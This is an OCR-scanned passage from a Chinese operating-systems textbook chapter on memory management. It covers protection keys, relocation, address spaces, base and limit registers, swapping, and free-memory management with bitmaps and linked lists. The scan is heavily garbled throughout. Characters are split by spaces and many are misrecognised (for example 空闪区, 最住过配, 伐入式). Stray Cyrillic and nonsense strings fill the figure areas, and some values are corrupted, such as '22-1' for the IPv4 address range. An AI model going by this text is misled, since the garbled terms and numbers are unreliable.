在 ROM 中 的 系统 部 分 称 为 BIOS (Basic Input Output System， 基 本 输入 给 出 系统 ) 。 第 一 种 方案 和 第 三 种 
方案 的 缺点 是 用 户 程序 出 现 的 错误 可 能 摧毁 操作 系统 ， 引 发 灾难 性 后 果 (比如 纂 改 磁盘 ) 。 

当 按 这 种 方式 组 织 系统 时 ， 通 常 同一 个 时 刻 只 能 有 一 个 进程 在 运行 。 一 旦 用 户 键入 了 一 个 命令 , 操 
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作 系统 就 把 需要 的 程序 从 磁盘 复制 到 内 存 中 并 执行 ， 当 进程 运行 结束 后 ， 操 作 系统 在 用 户 终端 显示 提示 
符 并 等 待 新 的 命令 。 收 到 新 的 命令 后 ， 它 把 新 的 程序 装 和 内存， 覆盖 前 一 个 程序 。 


OxFFF . 


位 于 ROM 中 
的 操作 系统 


用 户 程序 


用 户 程序 
位 于 RAM 中 
的 操作 系统 


位 于 RAM 中 
的 操作 系统 


0 0 
а) b) с) 


图 3-! 在 只 有 操作 系统 和 一 个 用 户 进程 的 情形 下 ， 组 织 内 存 的 三 种 简单 方法 (当然 也 存在 其 他 方案 ) 


在 没有 内 存 抽象 的 系统 中 实现 并 行 的 一 种 方法 是 使 用 多 线程 来 编程 。 由 于 在 引入 线程 时 就 假设 一 个 
进程 中 的 所 有 线程 对 同一 内 存 映像 都 可 见 ， 那 么 实现 并 行 也 就 不 是 问题 了 。 虽 然 这 个 想法 行 得 通 ， 但 却 
没有 被 广泛 使 用 ， 因 为 人 们 通常 希望 能 够 在 同一 时 间 运行 没有 关联 的 程序 ， 而 这 正 是 线程 抽象 所 不 能 提 
供 的 。 更 进一步 地 ， 一 个 没有 内 存 抽象 的 系统 也 不 大 可 能 具有 线程 抽象 的 功能 。 

在 不 使 用 内 存 抽象 的 情况 下 运行 多 道 程序 

但 是 ， 即 使 没有 内 存 抽象 ， 同 时 运行 多 个 程序 也 是 可 能 的 。 操 作 系统 只 需要 把 当前 内 存 中 所 有 内 容 
保存 到 磁盘 文件 中 ， 然 后 把 下 一 个 程序 读 和 人 到 内 存 中 再 运行 即 可 。 只 要 在 某 一 个 时 间 内 存 中 只 有 一 个 程 
序 ， 那 么 就 不 会 发 生 冲突 。 这 样 的 交换 概念 会 在 下 面 讨论 。 

在 特殊 硬件 的 帮助 下 ， 即 使 没有 交换 功能 ， 并 发 地 运行 多 个 程序 也 是 可 能 的 。IBM 360 的 早期 模型 
是 这 样 解决 的 ,内存 被 划分 为 2KB 的 块 ， 每 个 块 被 分 配 一 个 4 位 的 保护 键 ， 保护 键 存储 在 CPU 的 特殊 寄 
存 器 中 。 一 个 内 存 为 IMB 的 机 器 只 需要 512 个 这 样 的 4 位 寄存 器 ， 容 量 总 共 为 256 字 节 。PSW (Program 
Status Word， 程 序 状态 字 ) 中 存 有 一 个 4 位 码 。 一 个 行 中 的 进程 如 果 访 问 保护 键 与 其 PSW 码 不 同 的 内 
存 ，360 的 硬件 会 捕获 到 这 一 事件 。 因 为 只 有 操作 系统 可 以 修改 保护 键 ， 这 样 就 可 以 防止 用 户 进程 之 间 、 
用 户 进程 和 操作 系统 之 间 的 互相 干扰 。 

然而 ， 这 种 解决 方法 有 一 个 重要 的 缺陷 。 如 图 3-2 所 示 ， 假 设 我 们 有 两 个 程序 ， 每 个 大 小 各 为 16KB， 
如 图 3-2a 和 图 3-2b 所 示 。 前 者 加 了 阴影 表示 它 和 后 者 使 用 不 同 的 内 存 键 。 第 一 个 程序 一 开始 就 跳 转 到 地 
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b) 
图 3-2 重 定位 问题 的 说 明 : а) 一 个 16KB 程 序 ，b) 另 一 个 16KB 程 序 ，c) 两 个 程序 连续 地 装载 到 内 存 中 
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址 24， 那 里 是 一 条 MOV 指 令 。 第 二 个 程序 一 开始 跳 转 到 地 址 28 ， 那 里 是 一 条 CMP 指 令 。 与 讨论 无 关 的 
指令 没有 夯 出 来 。 当 两 个 程序 被 连续 地 装载 到 内 存 中 从 0 开始 的 地 址 时 ， 内 存 中 的 状态 就 如 同 图 3-2c 所 
示 。 在 这 个 例子 里 ， 我 们 假设 操作 系统 是 在 高 地 址 处 ， 图 中 没有 画 出 来 。 

程序 装载 完毕 之 后 就 可 以 运行 了 。 由 于 它们 的 内 存 键 不 同 ， 它 们 不 会 破坏 对 方 的 内 存 。 但 在 另 一 方 
面 会 发 生 问题 。 当 第 一 个 程序 开始 运行 时 ， 它 执行 了 JMP 24 指 令 ， 然 后 不 出 预料 地 跳 转 到 了 相应 的 指令 ， 
这 个 程序 会 正常 运行 。 

但 是 ， 当 第 一 个 程序 已 经 运行 了 一 段 时 间 后 ， 操 作 系统 可 能 会 决定 开始 运行 第 二 个 程序 ， 即 装载 在 
第 一 个 程序 之 上 的 地 址 16 384 处 的 程序 。 这 个 程序 的 第 一 条 指令 是 JMP 28， 这 条 指令 会 使 程序 跳 转 到 第 
一 个 程序 的 ADD 指 令 ， 而 不 是 事先 设 定 的 跳 转 到 CMP 指 令 。 由 于 对 内 存 地 址 的 不 正确 访问 ， 这 个 程序 
很 可 能 在 1 秒 之 内 就 崩溃 了 。 

这 里 关键 的 问题 是 这 两 个 程序 都 引用 了 绝对 物理 地 址 ， 而 这 正 是 我 们 最 需要 避免 的 。 我 们 希望 每 个 
程序 都 使 用 一 套 私 有 的 本 地 地 址 来 进行 内 存 寻 址 。 下 面 我 们 会 展示 这 种 技术 是 如 何 实现 的 。IBM 360 对 
上 述 问题 的 补救 方案 就 是 在 第 二 个 程序 装载 到 内 存 的 时 候 ， 使 用 静态 重 定位 的 技术 修改 它 。 它 的 工作 方 
RAF: 当 一 个 程序 被 装载 到 地 址 16 384 时 ， 常 数 16 384 被 加 到 每 一 个 程序 地 址 上 。 虽 多 个 机 制 在 不 
出 错误 的 情况 下 是 可 行 的 ， 但 这 不 是 一 种 通用 的 解决 办 法 ， 同 时 会 减 慢 装载 速度 。 而 且 ， 它 要 求 给 所 有 
的 可 执行 程序 提供 额外 的 信息 来 区 分 哪些 内 存 字 中 存 有 (可 重 定位 的 ) 地 址 ， 哪些 没有 。 毕 竟 ， 图 3-2b 
中 的 “28” 需 要 被 重 定位 ， 但 是 像 

MOV REGISTER1, 28 
这 样 把 数 28 送 到 REGISTER1 的 指令 不 可 以 被 重 定位 。 装载 器 需要 一 定 的 方法 来 辨别 地 址 和 常数 。 

最 后 ， 正 如 我 们 在 第 1 章 中 指出 的 ， 计 算 机 世界 的 发 展 总 是 倾向 于 重复 历史 。 虽然 直接 引用 物理 地 
址 对 于 大 型 计算 机 、 小 型 计算 机 、 台 式 计 算 机 和 笔记 本 电脑 来 说 已 经 成 为 很 久远 的 记忆 了 (对 此 我 们 深 
表 遗 盎 )， 但 是 缺少 内 存 抽象 的 情况 在 做 入 式 系统 和 智能 卡 系统 中 还 是 很 常见 的 。 现在 ， 像 收音 机 、 洗 
衣 机 和 微波 炉 这 样 的 设备 都 已 经 完全 被 ROM 形式 的 ) 软件 控制 ， 在 这 些 情况 下 ， 软 件 都 采用 访问 绝 
对 内 存 地 址 的 寻 址 方式 。 在 这 些 设备 中 这 样 能 够 正常 工作 是 因为 ， 所 有 运行 的 程序 都 是 可 以 事先 确定 的 ， 
用 户 不 可 能 在 烤 面包 机 上 自由 地 运行 他 们 自己 的 软件 。 

虽然 高 端的 戏 入 式 系统 (比如 手机 ) 有 复杂 的 操作 系统 ， 但 是 一 般 的 简单 伐 入 式 系统 并 非 如 此 。 在 
某 些 情况 下 可 以 用 一 种 简单 的 操作 系统 ， 它 只 是 一 个 被 链接 到 应 用 程序 的 库 ， 该 库 为 程序 提供 IO 和 其 
他 任务 所 需要 的 系统 调用 。 操 作 系 统 作为 库 实现 的 常见 例子 如 流行 的 e-cos 操 作 系统 。 


3.2 一 种 存储 器 抽象 ， 地 址 空间 

总 之 ， 把 物理 地 址 暴露 给 进程 会 带 来 下 面 几 个 严重 问题 。 第 一 ， 如 果 用 户 程序 可 以 寻 址 内 存 的 每 个 
字 节 ， 它 们 就 可 以 很 容易 地 (故意 地 或 偶然 地 ) 破坏 操作 系统 ， 从 而 使 系统 慢 慢 地 停 了 (除非 有 特 
殊 的 硬件 进行 保护 ， 如 IBM 360 的 锁 键 模式 )。 即 使 在 只 有 一 个 用 户 进程 运行 的 情况 下 ， 这 个 问题 也 是 存 
在 的 。 第 二 ， 使 用 这 种 模型 ， 想 要 同时 (如果 只 有 一 个 CPU 就 轮流 执行 ) 运行 多 个 程序 是 很 困难 的 。 在 
个 人 计算 机 上 ， 同 时 打开 几 个 程序 是 很 常见 的 (一 个 文字 处 理 器 ， 一 个 邮件 程序 ， 一 个 网 络 浏览 器 ， 其 
中 一 个 当前 正在 工作 ， 其 余 的 在 按 下 鼠标 的 时 候 才 会 被 激活 ) 。 在 系统 中 没有 对 物理 内 存 的 抽象 的 情况 
下 ， 很 难 做 到 上 述 情景 ， 因 此 ， 我 们 需要 其 他 办 法 。 


3.2.1 地 址 空间 的 概念 

要 保证 多 个 应 用 程序 同时 处 于 内 存 中 并 且 不 互相 影响 ， 则 需要 解决 两 个 问题 ; 保护 和 重 定位 。 我 们 
来 看 一 个 原始 的 对 前 者 的 解决 办 法 ， 它 曾 被 用 在 IBM 360 E; 给 内 存 块 标记 上 一 个 保护 键 ， 并 且 比 较 执 
行进 程 的 键 和 其 访问 的 每 个 内 存 字 的 保护 键 。 然 而 ， 这 种 方法 本 身 并 没有 解决 后 一 个 问题 ， 虽然 这 个 问 
题 可 以 通过 在 程序 被 装载 时 重 定位 程序 来 解决 ， 但 这 是 一 个 缓慢 且 复 杂 的 解决 方法 。 

一 个 更 好 的 办 法 是 创造 一 个 新 的 内 存 抽象 ， 地 址 空间 。 就 像 进程 的 概念 创造 了 一 类 抽象 的 CPU 以 运 
行程 序 一 样 ， 地 址 室 间 为 程序 创造 了 一 种 抽象 的 内 存 。 地 址 空间 是 一 个 进程 可 用 于 寻 址 内 存 的 一 赛 地 址 
集合 。 每 个 进程 都 有 一 个 自己 的 地 址 空间 ， 并 且 这 个 地 址 空间 独立 于 其 他 进程 的 地 址 空间 (除了 在 一 些 
特殊 情况 下 进程 需要 共享 它们 的 地 址 空间 外 ) 。 
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地 址 空间 的 概念 非常 通用 ， 并 且 在 很 多 场合 中 出 现 。 比 如 电话 号 码 ， 在 美国 和 很 多 其 他 国家 ， 一 个 
本 地 电话 号 码 通常 是 一 个 7 位 的 数字 。 因 此 ， 电 话 号 码 的 地 址 空间 是 从 0 000 000 到 9 999 999， 虽 然 一 些 
号 码 并 没有 被 使 用 ， 比 如 以 000 开 头 的 号 码 。 随 着 手机 、 调 制 解 调 器 和 传真 机 数量 的 增长 ， 这 个 空间 变 
得 越 来 越 不 够 用 了 ， 从 而 导致 需要 使 用 更 多 位 数 的 号 码 。Pentium 的 IO 端口 的 地 址 空间 从 0 到 16 383, 
IPv4 的 地 址 是 32 位 的 数字 ， 因 此 它们 的 地 址 空间 从 0 到 22-1 (也 有 一 些 保留 数字 ) 。 

地 址 空间 可 以 不 是 数字 的 。 一 套 “.com” 的 互联 网 域名 也 是 地 址 空间 。 这 个 地 址 空间 是 由 所 有 包含 
2~63 个 字符 并 且 后 面 跟着 “.com” 的 字符 串 组 成 的 ， 组 成 这 些 字符 串 的 字符 可 以 是 字母 、 数 字 和 连 字符 。 
到 现在 你 应 该 已 经 明白 地 址 空间 的 概念 了 。 它 是 很 简单 的 。 

比较 难 的 是 给 每 个 程序 一 个 自己 的 地 址 空间 ， 使 得 一 个 程序 中 的 地 址 28 所 对 应 的 物理 地 址 与 
另 一 个 程序 中 的 地 址 28 所 对 应 的 物理 地 址 不 同 。 下 面 我 们 将 讨论 一 个 简单 的 方法 ， 这 个 方法 曾经 
很 常见 ， 但 是 在 有 能 力 把 更 复杂 (而 且 更 好 ) 的 机 制 运用 在 现代 CPU 芯片 上 之 后 ， 这 个 方法 就 不 再 
使 用 了 。 

基 址 寄存 器 与 界限 寄存 器 

这 个 简单 的 解决 办 法 使 用 一 种 简单 的 动态 重 定位 。 它 所 做 的 是 简单 地 把 每 个 进程 的 地 址 空间 映射 到 
物理 内 存 的 不 同 部 分 。 从 CDC 6600 (世界 上 最 早 的 超级 计算 机 ) 到 Intel 8088 (原始 IBM PC 的 心脏 )， 
所 使 用 的 经 典 办 法 是 给 每 个 CPU 配置 两 个 特殊 硬件 寄存 器 ， 通 常 叫做 基 址 寄存 器 和 界限 寄存 器 。 当 使 用 
基 址 寄存 器 和 界限 寄存 器 时 ， 程 序 装载 到 内 存 中 连续 的 空闲 位 置 且 装载 期 间 无 须 重 定位 ， 如 图 3-2c 所 示 。 
当 一 个 进程 运行 时 ， 程 序 的 起 始 物理 地 址 装载 到 基 址 寄存 器 中 ， 程 序 的 长 度 装载 到 界限 寄存 器 中 。 在 图 
3-2c 中 ， 当 第 一 个 程序 运行 时 ， 装 载 到 这 些 硬件 寄存 器 中 的 基 址 和 界限 值 分 别 是 0 和 16 384。 当 第 二 个 程 
序 运行 时 ， 这 些 值 分 别 是 16 384 和 32 768。 如 果 第 三 个 16KB 的 程序 被 直接 装载 在 第 二 个 程序 的 地 址 之 上 
并 且 运 行 ， 这 时 基 址 寄存 器 和 界限 寄存 器 里 的 值 会 是 32 768 和 16 384, 

每 次 一 个 进程 访问 内 存 ， 取 一 条 指令 ， 读 或 写 一 个 数据 字 ，CPU 硬 件 会 在 把 地 址 发 送 到 内 存 总 线 前 ， 
自动 把 基 址 值 加 到 进程 发 出 的 地 址 值 上 。 同 时 ， 它 检查 程序 提供 的 地 址 是 否 等 于 或 大 于 界限 寄存 器 里 的 值 。 
如 果 访 问 的 地 址 超过 了 界限 ， 会 产生 错误 并 中 止 访问 。 这 样 ， 对 图 3-2c 中 第 二 个 程序 的 第 一 条 指令 ， 程 序 
执行 

JMP 28 


指令 ， 但 是 硬件 把 这 条 指令 解释 成 为 
JMP 16412 界限 寄存 器 
所 以 程序 如 我 们 所 愿 地 跳 转 到 了 CMP 指 令 。 在 图 3-2c 中 第 
二 个 程序 的 执行 过 程 中 ， 基 址 寄存 器 和 界限 寄存 器 的 设置 
如 图 3-3 所 示 。 
使 用 基 址 寄存 器 和 界限 寄存 器 是 给 每 个 进程 提供 私有 
地 址 空间 的 非常 容易 的 方法 ， 因 为 每 个 内 存 地 址 在 送 到 内 一 
存 之 前 ， 部 会 自动 先 加 上 基 址 寄存 器 的 内 容 。 在 很 多 实际 [16м j 
系统 中 ， 对 基 址 寄存 器 和 界限 寄存 器 会 以 一 定 的 方式 加 以 7 
保护 ， 使 得 只 有 操作 系统 可 以 修改 它们 。 在 CDC 6600 中 就 Sira 


[em aa 


提供 了 对 这 些 寄存 器 的 保护 ， 但 在 Intel 8088 中 则 没有 ， 甚 2 
至 没有 界限 寄存 器 。 但 是 ，Intel 8088 提 供 了 多 个 基 址 寄存 20 
器 ， 使 程序 的 代码 和 数据 可 以 被 独立 地 重 定 位 ， 但 是 没有 16 
提供 引用 地 址 越界 的 预防 机 制 。 18 

使 用 基 址 寄存 器 和 界限 寄存 器 重 定位 的 缺点 是 ， 每 次 4 
访问 内 存 都 需要 进行 加 法 和 比较 运算 。 比 较 可 以 做 得 很 快 ， 0 


但 是 加 法 由 于 进位 传递 时 间 的 问题 ， 在 没有 使 用 特殊 电路 。 图 3-3 基 址 寄存 器 和 界限 寄存 器 可 用 于 为 
的 情况 下 会 显得 很 慢 。 每 个 进程 提供 一 个 独立 的 地 址 空间 
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3.2.2 交换 技术 

如 果 计 算 机 物理 内 存 足够 大 ， 可 以 保存 所 有 进程 ， 那 么 之 前 提 及 的 所 有 方案 都 或 多 或 少 是 可 行 的 。 
但 实际 上 ， 所 有 进程 所 需 的 RAM 数 量 总 和 通常 要 远 远 超出 存储 器 能 够 支持 的 范围 。 在 一 个 典型 的 
Windows 或 Linux 系 统 中 ， 在 计算 机 完成 引导 后 ， 会 启动 40~60 个 ， 甚 至 更 多 的 进程 。 例 如 ， 当 一 个 
Windows 应 用 程序 安装 后 ， 通 常会 发 出 一 系列 命令 ， 使 得 在 此 后 的 系统 引导 中 会 启动 一 个 仅仅 用 于 查看 
该 应 用 程序 更 新 的 进程 。 这 样 一 个 进程 会 轻易 地 占据 5~10MB 的 内 存 。 其 他 后 台 进程 还 会 查看 所 收 到 的 
邮件 和 进来 的 网 络 连接 ， 以 及 其 他 很 多 诸如 此 类 的 任务 。 并 且 ， 这 一 切 都 发 生 在 第 一 个 用 户 程序 启动 之 
前 。 当 前 重要 的 应 用 程序 能 轻易 地 占据 50~200MB 甚 至 更 多 的 空间 。 因 此 ， 把 所 有 进程 一 直 保 存在 内 存 
中 需要 巨大 的 内 存 ， 如 果 内 存 不 够 ， 就 做 不 到 这 一 点 。 

有 两 种 处 理 内 存 超载 的 通用 方法 。 最 简单 的 策略 是 交换 (swapping) 技术 ， 即 把 一 个 进程 完整 调和 人 
内 存 ， 使 该 进程 运行 一 段 时 间 ， 然 后 把 它 存 回 磁盘 。 空 闲 进程 主要 存储 在 磁盘 上 ， 所 以 当 它们 不 运行 时 
就 不 会 占用 内 存 (尽管 它们 的 一 些 进程 会 周期 性 地 被 唤醒 以 完成 相关 工作 ， 然 后 就 又 进入 睡眠 状 
另 一 种 策略 是 虚拟 内 存 (virtual memory) ,该 策 略 甚至 能 使 程序 在 只 有 一 部 分 被 调和 信 内存 的 情况 下 
下 面 我 们 先 讨论 交换 技术 ，3.3 节 我 们 将 考察 虚拟 内 存 。 

交换 系统 的 操作 如 图 3-4 所 示 。 开 始 时 内 存 中 只 有 进程 A。 之 后 创建 进程 B 和 C 或 者 从 磁盘 将 它们 换 
和 内存。 图 3-4d 显 示 A 被 交换 到 磁盘 。 然 后 D 被 调和 信 ，B 被 调 出 ， 最 后 A 再 次 被 调 入 。 由 于 A 的 位 置 发 生 
变化 ， 所 以 在 它 换 和 的 时 候 通过 软件 或 者 在 程序 运行 期 间 (多 数 是 这 种 情况 ) 通过 硬件 对 其 地 址 进行 重 
定位 。 例 如 ， 在 这 里 可 以 很 好 地 使 用 基 址 寄存 器 和 界限 寄存 器 。 
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图 3-4 内 存 分 配 情况 随 着 进程 进出 而 变化 ， 阴 影 区 域 表示 未 使 用 的 内 存 


交换 在 内 存 中 产生 了 多 个 空闲 区 (hole， 也 称 为 空洞 )， 通 过 把 所 有 的 进程 尽 可 能 向 下 移动 ， 有 可 
能 将 这 些小 的 空闲 区 合成 一 大 块 。 该 技术 称 为 内 存 权 缩 (memory compaction) 。 这 个 操作 通常 不 进行 ， 
因为 它 要 耗费 大 量 的 CPU 时 间 。 例 如 ， 一 台 有 1GB 内 存 的 计算 机 可 以 每 20ns 复 制 4 个 字 节 ， 它 紧缩 全 部 
内 存 大 约 要 花费 5s。 

有 一 个 问题 值得 注意 ， 即 当 进 程 被 创建 或 换 入 时 应 该 为 它 分 配 多 大 的 内 存 。 若 进程 创建 时 其 
大 小 是 固定 的 并 且 不 再 改变 ， 则 分 配 很 简单 ， 操 作 系 统 准确 地 按 其 需要 的 大 小 进行 分 配 ， 不 多 也 
不 少 。 

但 是 如 果 进 程 的 数据 段 可 以 增长 ， 例 如 ， 很 多 程序 设计 语言 都 允许 从 堆 中 动态 地 分 配 内 存 ， 那 么 当 
进程 空间 试图 增长 时 ， 就 会 出 现 问题 。 若 该 进程 与 一 个 空间 区 相 邻 ， 那 么 可 把 该 空 闪 区 分 配给 该 进程 让 它 
在 这 个 空闲 区 增 大 。 另 一 方面 ， 若 进程 相 邻 的 是 另 一 个 进程 ， 那 么 要 么 把 需要 增长 的 进程 移 到 内 存 中 一 个 
足够 大 的 区 域 中 去 ， 要 么 把 一 个 或 多 个 进程 交换 出 去 ， 以 便 生成 一 个 足够 大 的 空闲 区 。 若 一 个 进程 在 内 存 
中 不 能 增长 ， 而 且 磁盘 上 的 交换 区 也 已 满 了 ， 那 么 这 个 进程 只 有 挂 起 直到 一 些 空间 空闲 〈 或 者 可 以 结束 该 
进程 ) 。 
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如 果 大 部 分 进程 在 运行 时 都 要 增长 ， 为 了 减少 因 内 存 区 域 不 够 而 引起 的 进程 交换 和 移动 所 产生 的 开 
销 ， 一 种 可 用 的 方法 是 ， 当 换 入 或 移动 进程 时 为 它 分 配 一 些 额外 的 内 存 。 然 而 ， 当 进程 被 换 出 到 磁盘 上 
时 ， 应 该 只 交换 进程 实际 上 使 用 的 内 存 中 的 内 容 ， 将 额外 的 内 存 交换 出 去 是 一 种 浪费 。 在 图 3-5a 中 读者 
可 以 看 到 一 种 已 为 两 个 进程 分 配 了 增长 空间 的 内 存 配置 。 
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图 3-5 а) 为 可 能 增长 的 数据 段 预 留 空 间 ，b) 为 可 能 增长 的 数据 段 和 堆栈 段 预 留 空间 


如 果 进 程 有 两 个 可 增长 的 段 ， 例 如 ， 供 变量 动态 分 配 和 释放 的 作为 堆 使 用 的 一 个 数据 段 ， 以 及 存放 
普通 局 部 变量 与 返回 地 址 的 一 个 堆栈 段 ， 则 可 使 用 另 一 种 安排 ， 如 图 3-5b 所 示 。 在 图 中 可 以 看 到 所 示 进 
程 的 堆栈 段 在 进程 所 占 内 存 的 顶端 并 向 下 增长 ， 紧 接 在 程序 段 后 面 的 数据 段 向 上 增长 。 在 这 两 者 之 间 的 
内 存 可 以 供 两 个 段 使 用 。 如 果 用 完了 ， 进 程 或 者 必须 移动 到 足够 大 的 空闲 区 中 ( 它 可 以 被 交换 出 内 存 直 
到 内 存 中 有 足够 的 空间 ) ， 或 者 结束 该 进程 。 

323 ”空闲 内 存 管理 

在 动态 分 配 内 存 时 ， 操 作 系统 必须 对 其 进行 管理 。-- 般 而 言 ， 有 两 种 方式 跟踪 内 存 使 用 情况 ， 位 图 
和 空闲 链表 。 下 面 我 们 将 介绍 这 两 种 方式 。 

1. 使 用 位 图 的 存储 管理 

使 用 位 图 方法 时 ， 内 存 可 能 被 划分 成 小 到 几 个 字 或 大 到 几 千 字 节 的 分 配 单元 。 每 个 分 配 单元 对 应 于 
位 图 中 的 一 位 ，0 表 示 空 亲 ，1! 表 示 占 用 (或 者 相反 )。 一 块 内 存 区 和 其 对 应 的 位 图 如 图 3-6 所 示 。 
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图 3-6 а) 一 段 有 5 个 进程 和 3 个 空闲 区 的 内 存 ， 刻 度 表示 内 存 分 本 的 单元 ， 阴 影 区 域 表 示 空 亲 
(在 位 图 中 用 0 表示 ) ，b) 对 应 的 位 图 ，c) 用 空闲 表 表示 的 同样 的 信息 
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分 配 单元 的 大 小 是 一 个 重要 的 设计 因素 。 分 配 单元 越 小 ， 位 图 越 大 。 然 而 即使 只 有 4 个 字 节 大 小 的 
分 配 单元 ，32 位 的 内 存 也 只 需要 位 图 中 的 1 位 ，32n 位 的 内 存 需要 a 位 的 位 图 ， 所 以 位 图 只 占用 了 1/33 的 
内 存 。 若 选择 比较 大 的 分 配 单元 ， 则 位 图 更 小 。 但 车 进 程 的 大 小 不 是 分 配 单元 的 整数 倍 ， 那 么 在 最 后 一 
个 分 配 单元 中 就 会 有 一 定数 量 的 内 存 被 浪费 了 。 

因为 内 存 的 大 小 和 分 配 单元 的 大 小 决定 了 位 图 的 大 小 ， 所 以 它 提供 了 一 种 简单 的 利用 一 块 固定 大 小 
的 内 存 区 就 能 对 内 存 使 用 情况 进行 记录 的 方法 。 这 种 方法 的 主要 问题 是 ， 在 决定 把 一 个 占 /个 分 配 单元 
的 进程 调和 内存 时 ， 存 储 管理 器 必须 搜索 位 图 ， 在 位 图 中 找 出 有 4 个 连续 0 的 串 。 查 找 位 图 中 指定 长 度 的 
连续 0 册 是 耗 时 的 操作 (因为 在 位 图 中 该 囊 可 能 跨越 字 的 边界 ) ， 这 是 位 图 的 缺点 。 

2 使 用 链表 的 存储 管理 

另 一 种 记录 内 存 使 用 情况 的 方法 是 ， 维 护 一 个 记录 已 分 配 内 存 段 和 空 有 内存 眉 的 链表 。 其 中 链表 中 
的 一 个 结 点 或 者 包含 一 个 进程 ， 或 者 是 两 个 进程 间 的 а і 
= авиан, «лиз вся вьедедыз. АШОК у= 
6a 所 示 的 内 存 布局 。 链 表 中 的 每 一 个 结 点 都 包含 以 下 эш 


W: 空 亲 区 (Н) 或 进程 (P) 的 指示 标志 、 起 始 地 址 、 DODA з СУТ 
长 度 和 指向 下 一 结 点 的 指针 。 > ZAJ] 2R ZAE] 


在 本 例 中 ， 段 链表 是 按照 地 址 排序 的 ， 其 好 处 是 yy ш aF 
当 进 各 终止 或 被 换 册 时 链表 的 更 新 非 党 直接。 一 个 要 COLHA за 22 


终止 的 进程 一 般 有 两 个 邻居 (除非 它 是 在 内 存 的 最 底 。 “图 3-7 结束 进程 X 时 与 相 邻 区 域 的 四 种 组 合 
端 或 最 顶端 )， 它 们 可 能 是 进程 也 可 能 是 空 闪 区 ， 这 就 

导致 了 图 3-7 所 示 的 四 种 组 合 。 在 图 3-7a 中 更 新 链表 需要 把 P 赫 换 为 H， 在 图 3-7b 和 图 3-7c 中 两 个 结 点 被 合 
并 成 为 一 个 ， 链 表 少 了 一 个 结 点 ， 在 图 3-7d 中 三 个 结 点 被 合并 为 一 个 ， 从 链表 中 删除 了 两 个 结 点 。 

因为 进程 表 中 表示 终止 进程 的 结 点 中 通常 含有 指向 对 应 于 其 段 链表 结 点 的 指针 ， 因此 段 链表 使 用 双 
链表 可 能 要 比 图 3-6c 所 示 的 单 链表 更 方便 。 这 样 的 结构 更 易于 找到 上 一 个 结 点 ， 并 检查 是 否 可 以 合并 。 

当 按照 地 址 顺序 在 链表 中 存放 进程 和 空闲 区 时 ， 有 几 种 算法 可 以 用 来 为 创建 的 进程 (或 从 磁盘 换 人 
的 已 存在 的 进程 ) 分 配 内 存 。 这 里 ， 假设 存储 管理 器 知道 要 为 进程 分 配 的 多 大 的 内 存 。 最 简单 的 算法 是 
首次 适 配 (first fit) 算法 。 存 储 管理 器 沿 着 段 链表 进行 搜索 ， 直到 找到 一 个 足够 大 的 空闲 区 ， 除 非 空闲 
区 大 小 和 要 分 配 的 空间 大 小 正好 一 样 ， 否 则 将 该 空闲 区 分 为 两 部 分 ， 一 部 分 供 进程 使 用 ， 另 一 部 分 形成 
新 的 空 闪 区 。 首 次 适 配 算法 是 一 种 速度 很 快 的 算 它 尽 可 能 少 地 搜索 链表 结 点 。 

对 首次 适 配 算法 进行 很 小 的 修改 就 可 以 得 到 下 次 舌 配 (next fit) 算法 。 它 的 工作 方式 和 首次 适 配 算 
法 相同 ， 不 同 点 是 每 次 找到 合适 的 空闲 区 时 都 记录 当时 的 位 置 。 以 便 在 下 次 寻找 空闲 区 时 从 上 次 结束 的 
地 方 开始 搜索 ， 而 不 是 像 首次 适 配 算法 那样 每 次 都 从 头 开始 。Bays (1977) 的 仿真 程序 证 明 下 次 适 配 算 
法 的 性 能 略 低 于 首次 适 配 算法 。 

另 一 个 著名 的 并 广泛 应 用 的 算法 是 最 住 过 配 (best fit) 算法 。 最 佳 适 配 算法 搜索 整个 链表 (从 开始 
到 结束 )， 找 出 能 够 容纳 进程 的 最 小 的 空闲 区 。 最 佳 适 配 算法 试图 找 出 最 接近 实际 需要 的 空间 区 ， 以 最 
好 地 区 配 请 求 和 可 用 空闲 区 ， 而 不 是 先 拆 分 一 个 以 后 可 能 会 用 到 的 大 的 空闲 区 。 

以 图 3-6 为 例 来 考察 首次 适 配 算法 和 最 佳 适 配 算法 。 假 如 需要 一 个 大 小 为 2 的 块 ， 首次 适 配 算法 将 分 
配 在 位 置 5 的 空闲 区 ， 而 最 佳 适 配 算法 将 分 配 在 位 置 18 的 空闲 区 。 

因为 每 次 调用 最 佳 适 配 算法 时 都 要 搜索 整个 链表 ， 所 以 它 要 比 首次 适 配 算法 慢 。 让 人 感到 有 点 意外 
的 是 它 比 首次 适 配 算法 或 下 次 适 配 算法 浪费 更 多 的 内 存 ， 因为 它 会 产生 大 量 无 用 的 小 空闲 区 。 一 般 情 况 
下 ， 首 次 适 配 算法 生成 的 空间 区 更 大 一 些 。 

最 佳 适 配 的 空 闪 区 会 分 裂 出 很 多 非常 小 的 空 闪 区 ， 为 了 避免 这 一 问题 ， 可 以 考虑 最 差 适 配 (worst 
fi) 算法 ， 即 总 是 分 配 最 大 的 可 用 空闲 区 ， 使 新 的 空闲 区 比较 大 从 而 可 以 继续 使 用 。 仿 真 程序 表明 最 差 
适 配 算法 也 不 是 一 个 好 主意 。 

如 果 为 进程 和 空闲 区 维护 各 自 独立 的 链表 ， 那么 这 四 个 算法 的 速度 都 能 得 到 提高 。 这 样 就 能 集中 精 
力 只 检查 空 闪 区 而 不 是 进程 。 但 这 种 分 配 速度 的 提高 的 一 个 不 可 避免 的 代价 就 是 增加 复杂 度 和 内 存 释放 
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速度 变 慢 ， 因 为 必须 将 一 个 回收 的 段 从 进程 链表 中 删除 并 插入 空闲 区 链表 。 

如 果 进 程 和 空闲 区 使 用 不 同 的 链表 ， 则 可 以 按照 大 小 对 空闲 区 链表 排序 ， 以 便 提 高 最 佳 适 配 算法 的 
速度 。 在 使 用 最 佳 适 配 算法 搜索 由 小 到 大 排列 的 空闲 区 链表 时 ， 只 要 找到 一 个 合适 的 空闲 区 ， 则 这 个 空 
闲 区 就 是 能 容纳 这 个 作业 的 最 小 的 空闲 区 ， 因 此 是 最 佳 适 配 。 因 为 空闲 区 链表 以 单 链表 形式 组 织 ， 所 以 
不 需要 进一步 搜索 。 空 闲 区 链表 按 大 小 排序 时 ， 首 次 适 配 算法 与 最 佳 适 配 算法 一 样 快 ， 而 下 次 适 配 算法 
在 这 里 则 毫 无 意义 。 

在 与 进程 段 分 离 的 单独 链表 中 保存 空闲 区 时 ， 可 以 做 一 个 小 小 的 优化 。 不 必 像 图 3-6c 那 样 用 单独 的 
数据 结构 存放 空闲 区 链表 ， 而 可 以 利用 空闲 区 存储 这 些 信息 。 ее 
